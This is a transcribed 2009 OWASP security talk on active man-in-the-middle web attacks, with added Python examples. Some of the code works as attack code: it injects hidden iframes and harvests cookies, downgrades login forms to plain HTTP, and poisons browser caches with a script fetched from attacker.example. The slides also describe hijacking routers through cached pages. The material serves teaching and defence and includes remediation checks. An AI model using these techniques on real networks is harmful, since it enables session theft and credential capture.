Active Man in the Middle Attacks


Active Man in the Middle Attacks
Adi Sharabani, Security Research Group Manager, IBM Rational Application Security (a.k.a. Watchfire), adish
OWASP, 27/02/2009. The OWASP Foundation, http://www.owasp.org

Agenda
Background:
- Man in the Middle
- Network level – heavily researched
- Web application level – sporadic research
Outline:
- Passive MitM attacks
- Active MitM attacks
- Penetrating an internal network
- Remediation

Man in the Middle Scenario
- All laptop users connect to a public network on their way to the Internet
- A wireless connection can easily be compromised or impersonated
- Wired connections might also be compromised

Rules of Thumb – Don’ts
Someone might be listening to the requests:
- Don’t browse sensitive sites
- Don’t supply sensitive information
Someone might be altering the responses:
- Don’t trust any information given on web sites
- Don’t execute downloaded code

Rules of Thumb – What Can You Do?
This leaves us with:
- Browse your favorite news site
- Browse your favorite weather site
(Diagram: the Internet split into non-sensitive sites, labelled “boring”, and sensitive sites, labelled “interesting”.)

You are still vulnerable

Mitigating a Fallacy
Fallacy: executing JavaScript on the victim == executing an attack.
Reality: the same origin policy confines a script to the domain it was served from. Executing an attack therefore needs either
- JavaScript + a browser implementation bug, or
- JavaScript + execution on a specific domain (which can be achieved through XSS).

Passive Man in the Middle Attacks
1. Victim browses to a website
2. Attacker views the request, manipulates it and forwards it to the server
3. Server returns a response
4. Attacker views the response, manipulates it and forwards it to the victim
Other servers are not affected.

Active Man in the Middle Attack
1. Victim browses to a “boring” site (My Weather Channel)
2. Attacker adds an IFRAME referencing an “interesting” site (My Bank Site) to the response; the IFRAME could be invisible
3. The victim’s browser sends an automatic request to the interesting server
4. Attacker transfers the request to the server
5. Server returns a response
The attacker actively directs the victim to an “interesting” site the victim never chose to visit.

Stealing Cookies*
The automatic request contains the victim’s cookies for the interesting site.
Obvious result: stealing cookies associated with any domain the attacker desires.
This also works for HttpOnly cookies (as opposed to XSS attacks), because the cookies are read from the wire, not from script.
* A similar attack was presented by Mike Perry (Active SideJacking, see references)
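The two steps above, the response rewrite that plants the hidden IFRAME and the cookie harvest from the request the browser then sends by itself, as an added example in Python; this is not code from the talk. The hosts weather.example and bank.example, the page markup and the request bytes are constructed for the example.

```python
"""Active MitM step from the slides: rewrite the plaintext response of a
"boring" site so it carries a hidden IFRAME pointing at an "interesting"
site, then read the cookies off the request the browser sends to that
site automatically. Hosts weather.example and bank.example, the page
markup and the request bytes are constructed for this example."""
from http.cookies import SimpleCookie

IFRAME = '<iframe src="{url}" width="0" height="0" style="display:none"></iframe>'


def split_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status line, headers, body).
    Header names are title-cased so lookups do not depend on the
    server's capitalisation."""
    head, body = raw.split(b"\r\n\r\n", 1)
    status, *lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().title()] = value.strip()
    return status, headers, body


def inject_iframe(raw_response: bytes, target_url: str) -> bytes:
    """Attacker side: add the hidden frame to an HTML response and fix
    Content-Length so the browser parses the modified page cleanly."""
    status, headers, body = split_response(raw_response)
    if not headers.get("Content-Type", "").startswith("text/html"):
        return raw_response  # only an HTML document can host the frame
    frame = IFRAME.format(url=target_url).encode()
    idx = body.lower().rfind(b"</body>")
    body = body[:idx] + frame + body[idx:] if idx != -1 else body + frame
    headers["Content-Length"] = str(len(body))
    head = "\r\n".join([status] + [f"{k}: {v}" for k, v in headers.items()])
    return head.encode("iso-8859-1") + b"\r\n\r\n" + body


def cookies_from_request(raw_request: bytes) -> dict:
    """Attacker side: the automatic request carries every cookie the
    browser holds for the target host. HttpOnly only hides a cookie from
    script; on an unencrypted wire it is as readable as any other."""
    head = raw_request.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "cookie":
            jar = SimpleCookie()
            jar.load(value.strip())
            return {k: morsel.value for k, morsel in jar.items()}
    return {}


# Constructed sample traffic: the boring site's page ...
BORING_BODY = b"<html><body><h1>Weather: sunny</h1></body></html>"
BORING_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: "
    + str(len(BORING_BODY)).encode() + b"\r\n\r\n" + BORING_BODY
)
# ... and the request the victim's browser then sends to the bank by itself.
AUTOMATIC_REQUEST = (
    b"GET /account HTTP/1.1\r\nHost: bank.example\r\n"
    b"Cookie: session=s3cr3t; auth=abc123\r\n\r\n"
)

if __name__ == "__main__":
    print(inject_iframe(BORING_RESPONSE, "http://bank.example/account").decode())
    print(cookies_from_request(AUTOMATIC_REQUEST))
```

The example assumes an identity-encoded body; a real interception proxy has to de-chunk and decompress the response before editing it and re-encode afterwards, otherwise the browser discards the page. Nothing here touches the bank’s server: the cookies are read from the victim’s own request, which is why neither the bank nor HttpOnly can notice or prevent it.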

Demo

Overcoming Same Origin Policy
1. Victim surfs to a “boring” site
2. Attacker injects an IFRAME directing to an “interesting” site
3. An automatic request is sent to the interesting server
4. Attacker forwards the automatic request to the “interesting” server
5. “Interesting” server returns a response
6. Attacker adds a malicious script to the response
7. The script executes with the “interesting” server’s restrictions, i.e. inside that site’s origin
Result: the attacker can execute scripts on any domain she desires, and those scripts can fully interact with any “interesting” website.
Limitation: this only works for non-SSL web sites.

Secure Connections – Login Mechanism

Secure Connections
1. Victim browses to the site http://www.webmail.site
2. Site returns a response with the login form (“Hello, Please Login”, Username, Password, SUBMIT); this pre-login page is sent in clear text
3. Victim fills in the login details (jsmith, ********) and submits the form
4. The login request is sent through a secure channel and the site answers “Login Successful, Hello John Smith”
Because the pre-login response travels in clear text, the attacker could alter it so that the login request is sent unencrypted.

Stealing Auto-Completion Information
1. Attacker redirects the victim to a request for a pre-login page
2. Attacker returns the original login form together with a malicious script
3. The script reads the auto-completed form values through the DOM
Result: the attacker can steal any auto-completion information she desires.
Limitations: only works for pre-login pages that are not encrypted; will not work seamlessly in IE.
* A passive version of this attack was described by RSnake in his blog (see references)
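The two previous slides describe the same weak spot from both sides: a login form delivered over plain HTTP can be rewritten so that credentials, typed or auto-completed, leave in clear text. The added Python example below (not code from the talk) shows the attacker’s rewrite next to the check a site owner would run on their own pages. The host www.webmail.site is the slide’s own example; the form markup is constructed.

```python
"""Pre-login attack from the slides: the login form of
http://www.webmail.site arrives over plain HTTP, so a MitM can rewrite
its action to http:// and the submitted (or auto-completed) credentials
leave in clear text. strip_https_actions is the attacker-side rewrite;
audit_login_page is the check a site owner would run. The form markup is
constructed for this example."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


def strip_https_actions(html: str) -> str:
    """Attacker side: downgrade every form action from https:// to http://."""
    return re.sub(r'(action\s*=\s*["\'])https://', r'\1http://', html, flags=re.IGNORECASE)


class _FormScanner(HTMLParser):
    """Collect (resolved action URL, has password field) for each form."""

    def __init__(self, page_url: str):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = [urljoin(self.page_url, attrs.get("action") or ""), False]
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current[1] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_login_page(html: str, page_url: str) -> list:
    """Defender side: flag password forms whose credentials can be read
    on the wire. A page delivered over http is flagged even when its
    action is https, because the attacker rewrites the page before the
    browser renders it (the partial-SSL case from the slides)."""
    scanner = _FormScanner(page_url)
    scanner.feed(html)
    findings = []
    for action, has_password in scanner.forms:
        if not has_password:
            continue
        if urlsplit(page_url).scheme == "http":
            findings.append(f"{action}: login form delivered over http, a MitM can rewrite it")
        elif urlsplit(action).scheme == "http":
            findings.append(f"{action}: submits credentials over http")
    return findings


# Constructed login page modelled on the slide (Username, Password, SUBMIT).
LOGIN_PAGE = """<html><body><p>Hello, Please Login</p>
<form action="https://www.webmail.site/login" method="post">
<input name="username" type="text"><input name="password" type="password">
<input type="submit" value="SUBMIT"></form></body></html>"""

if __name__ == "__main__":
    print(audit_login_page(LOGIN_PAGE, "http://www.webmail.site/"))
    print(audit_login_page(strip_https_actions(LOGIN_PAGE), "https://www.webmail.site/"))
```

The point of the audit is the first branch: an https action on an http page is not a defence, because the attacker controls the page that contains the action. The form has to be fetched over TLS, which is what the “partial SSL” remediation item at the end of the talk is about.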

Demo

Broadening the Attack (Time Dimension)

Past, Present, Future
- Passive MitM attacks act only in the present, on the “interesting” site the victim is visiting right now.
- Active MitM attacks start from a “boring” site in the present and reach “interesting” sites in the past (cookies, auto-completion data and cache already stored on the victim) and in the future (cookies and cache planted for later visits).

Session Fixation
1. Attacker redirects the victim to the site of interest
2. Attacker returns a page with a cookie generated by the server
3. The cookie is saved on the victim’s computer
4. A while later, the victim connects to the site (with the pre-provided cookie) and logs in
5. Attacker uses the same cookie to connect to the server
6. Server authenticates the attacker as the victim
Result: the attacker can set persistent cookies on the victim.
Limitation: the vulnerability also lies within the server, which must keep using a session identifier it issued before authentication.

Cache Poisoning
1. Attacker redirects the victim to the site of interest
2. Attacker returns a malicious page with caching enabled
3. The page is cached on the victim’s computer
4. A while later, the victim visits the site and the browser serves the poisoned page from its cache
Result: the attacker can poison any page she desires, and poisoned pages are persistent.
Limitation: the attacker can only poison non-SSL resources.
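What “with caching enabled” means in header terms, and why the poisoned page keeps coming back, as an added Python example that is not part of the talk: the attacker’s response rewrite on one side and a simplified model of the browser’s freshness decision (RFC 7234 rules) on the other. bank.example and attacker.example are hypothetical hosts and the responses are constructed.

```python
"""Cache poisoning from the slides: the attacker answers a redirected
request with a malicious page whose headers tell the browser to keep it
for a long time, so on later visits the page is served from the
victim's cache with no network traffic at all. freshness_lifetime and
served_from_cache model the browser's side (RFC 7234 freshness rules,
simplified). bank.example and attacker.example are hypothetical hosts;
the responses are constructed."""
from email.utils import formatdate, mktime_tz, parsedate_tz


def _split(raw: bytes):
    head, body = raw.split(b"\r\n\r\n", 1)
    status, *lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().title()] = value.strip()
    return status, headers, body


def _join(status: str, headers: dict, body: bytes) -> bytes:
    head = "\r\n".join([status] + [f"{k}: {v}" for k, v in headers.items()])
    return head.encode("iso-8859-1") + b"\r\n\r\n" + body


def poison_for_cache(raw_response: bytes, malicious_body: bytes, max_age: int, now: int) -> bytes:
    """Attacker side: swap in the malicious body and make it cacheable
    for max_age seconds. Validators are dropped so the browser has no
    reason to ask the real server whether the copy is still good."""
    status, headers, _ = _split(raw_response)
    for name in ("Pragma", "Etag", "Last-Modified", "Cache-Control", "Expires"):
        headers.pop(name, None)
    headers["Content-Type"] = "text/html"
    headers["Content-Length"] = str(len(malicious_body))
    headers["Date"] = formatdate(now, usegmt=True)
    headers["Cache-Control"] = f"public, max-age={max_age}"
    headers["Expires"] = formatdate(now + max_age, usegmt=True)  # for HTTP/1.0 caches
    return _join(status, headers, malicious_body)


def freshness_lifetime(headers: dict) -> int:
    """Seconds a browser may reuse the response without revalidating.
    no-store and no-cache are treated as zero; max-age wins over Expires."""
    directives = {}
    for item in headers.get("Cache-Control", "").split(","):
        name, _, value = item.strip().lower().partition("=")
        if name:
            directives[name] = value
    if "no-store" in directives or "no-cache" in directives:
        return 0
    if directives.get("max-age", "").isdigit():
        return int(directives["max-age"])
    expires = parsedate_tz(headers.get("Expires", ""))
    date = parsedate_tz(headers.get("Date", ""))
    if expires and date:
        return max(0, int(mktime_tz(expires) - mktime_tz(date)))
    return 0


def served_from_cache(headers: dict, stored_at: int, now: int) -> bool:
    """Victim side: would the copy stored at stored_at still be used at now?"""
    return now - stored_at < freshness_lifetime(headers)


NOW = 1_700_000_000  # fixed clock so the example is reproducible
ORIGINAL_BODY = b"<html><body>Bank</body></html>"
ORIGINAL = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nCache-Control: no-cache\r\n"
            b"Content-Length: " + str(len(ORIGINAL_BODY)).encode() + b"\r\n\r\n" + ORIGINAL_BODY)
MALICIOUS = b'<html><body><script src="http://attacker.example/x.js"></script></body></html>'

if __name__ == "__main__":
    poisoned = poison_for_cache(ORIGINAL, MALICIOUS, 365 * 86400, NOW)
    print(poisoned.decode())
    print("served from cache a month later:", served_from_cache(_split(poisoned)[1], NOW, NOW + 30 * 86400))
```

The server’s own no-cache directive never reaches the browser, so the fact that the real site is careful about caching does not help; only a TLS-protected resource is out of reach, which is the limitation the slide states. The same trick applied to a commonly embedded script rather than a page is what the “increasing the exposure” slide below builds on.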

Complex: Hacking Intranet Networks

Penetrating an Internal Network – Simple Cache Poison
Result: the attack is launched every time the victim accesses the poisoned resource, and it executes from inside the local intranet.
Characteristics:
- Firewall protections are helpless, since the malicious code runs in the victim’s browser behind the firewall
- Affected servers will never know
- The attack is persistent

Setting Up a Future MitM Scenario
1. Using active MitM techniques, the attacker poisons the victim’s cache for the router’s web interface
2. The malicious script executes when the victim later accesses the router
3. The script configures the router to tunnel future communication through the attacker (diagram: Outbound Proxy IP Address and Primary DNS Server Address both set to 216.187.118.221)
4. The script hides the configuration changes
Result: facilitates future MitM scenarios; does not require the router’s credentials; fake settings could be displayed to the user.
Limitations: requires the victim to access the router in the future; the attacker needs to guess the router’s address (10.0.1.1).

Increasing the Exposure
- Poison common home pages: the script will execute every time the victim opens his browser
- Poison common scripts: the script will execute on every page using the common script (example: http://www.google-analytics.com/ga.js)
- The “double active” attack: a common poisoned page redirects to another poisoned resource

The Double Active Cache Poisoning Attack
While the victim browses a “boring” site, the attacker uses active techniques to poison two resources:
- The local router’s address (such as 10.0.1.1): the poisoned page contains a script that will reconfigure the victim’s router
- Common pages (such as www.google.com): the poisoned pages redirect the victim to the local router’s poisoned page
At a later time, the victim goes back home and opens the browser:
1. The cached home page is loaded and redirects the browser to the router’s web interface
2. The cached router page is loaded and the malicious script changes the router’s settings, configuring it to tunnel all further communication through the attacker
Result: the internal network has been compromised.
Limitation: the attacker needs to guess the router’s IP and credentials.

Active Attack Characteristics
- Not noticeable in the user’s experience
- Not noticeable by any of the web sites
- IPS/IDS will not block it
- Can be persistent
- Can be used to hack into the local organization
- Bypasses any firewall or VPN
- Can be used with DNS pinning techniques
- A problem with the current design: requires only one plain HTTP request to be transmitted

Remediation – Users
- Do not use auto-completion
- “Clean slate policy”
- Trust level separation: two different browsers, two different users, two different OSes, virtualization products
- Tunnel communication through a secure proxy (might not be allowed in many hot-spots)

Remediation – Web Owners
- Consider the risks of partial SSL sites
- Do not consider a secure VPN connection as an SSL replacement
- Use random tokens for common scripts (while considering performance issues)
- Avoid referring to external scripts from internal sites
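Two of the web-owner items, the external-script exposure and the random token for common scripts, as an added Python example that is not part of the talk. Since this 2009 presentation, browsers have shipped HSTS and Subresource Integrity, which cover the “integrity mechanism for HTTP” the industry slide asks for; the check below does not depend on either. The hosts intranet.example and cdn.example are hypothetical and the page markup is constructed.

```python
"""Checks for the "Web owners" remediation items: audit_script_includes
reports scripts that an active MitM could poison (loaded over plaintext
http) and scripts shared with other sites (one poisoned cached copy,
such as ga.js, then runs on every page embedding it); cache_busted
appends a random token so a poisoned cached copy of a common script is
never reused. intranet.example and cdn.example are hypothetical hosts;
the page markup is constructed."""
import secrets
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlencode, urljoin, urlsplit, urlunsplit


class _ScriptCollector(HTMLParser):
    """Gather the src attribute of every <script> tag."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)


def audit_script_includes(html: str, page_url: str) -> list:
    """One finding per risk: plaintext transport (rewritable and
    cache-poisonable) and third-party origin (a single poisoned copy
    reaches every site that embeds it)."""
    page = urlsplit(page_url)
    collector = _ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.srcs:
        url = urlsplit(urljoin(page_url, src))
        if url.scheme == "http":
            findings.append(f"{url.geturl()}: loaded over plaintext http, can be rewritten or cache-poisoned")
        if url.netloc and url.netloc != page.netloc:
            findings.append(f"{url.geturl()}: third-party origin {url.netloc}, shared poisoned copy risk")
    return findings


def cache_busted(url: str, token: str = None) -> str:
    """Append a random query token so the browser never reuses a cached
    (possibly poisoned) copy of a common script. The cost is the lost
    cache hit on every page load, the performance issue the slide notes."""
    token = token or secrets.token_urlsafe(8)
    parts = urlsplit(url)
    query = parse_qsl(parts.query, keep_blank_values=True) + [("v", token)]
    return urlunsplit(parts._replace(query=urlencode(query)))


# Constructed intranet page: one plaintext third-party script, one
# same-origin relative script, one third-party script over TLS.
PAGE = ('<html><head>'
        '<script src="http://www.google-analytics.com/ga.js"></script>'
        '<script src="/js/app.js"></script>'
        '<script src="https://cdn.example/lib.js"></script>'
        '</head><body></body></html>')

if __name__ == "__main__":
    for finding in audit_script_includes(PAGE, "http://intranet.example/"):
        print(finding)
    print(cache_busted("http://www.google-analytics.com/ga.js"))
```

Note that the relative /js/app.js is flagged as plaintext only because the page itself is served over http: the scheme of the embedding page decides how same-origin resources travel, so moving the page to TLS fixes every relative include at once, while the third-party findings need a change of the include itself.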

Remediation – Industry
- Build an integrity mechanism for HTTP
- Secure WiFi networks

Summary
- Active MitM attacks broaden the scope of the passive attacks
- Design issues
- Dimension of time: past (steal cookies, auto-completion information, cache) and future (set up cookies, poison cache, poison form filler)
- Penetrating internal networks
- Persistent
- Bypass any current protection mechanism
More information: the paper and presentation will be uploaded to our blog, http://blog.watchfire.com

References
- Watchfire’s Blog: http://blog.watchfire.com
- Wireless Man in the Middle Attacks: http://www.informit.com/articles/article.aspx?p=353735&seqNum=7
- SideJacking: http://erratasec.blogspot.com/2007/08/sidejacking-with-hamster_05.html
- More on SideJacking: http://erratasec.blogspot.com/2008/01/more-sidejacking.html
- Active SideJacking: http://seclists.org/bugtraq/2007/Aug/0070.html
- Surf Jacking: http://resources.enablesecurity.com/resources/Surf%20Jacking.pdf
- Stealing User Information: http://ha.ckers.org/blog/20060821/stealing-user-information-via-automatic-form-filling/

Thank you!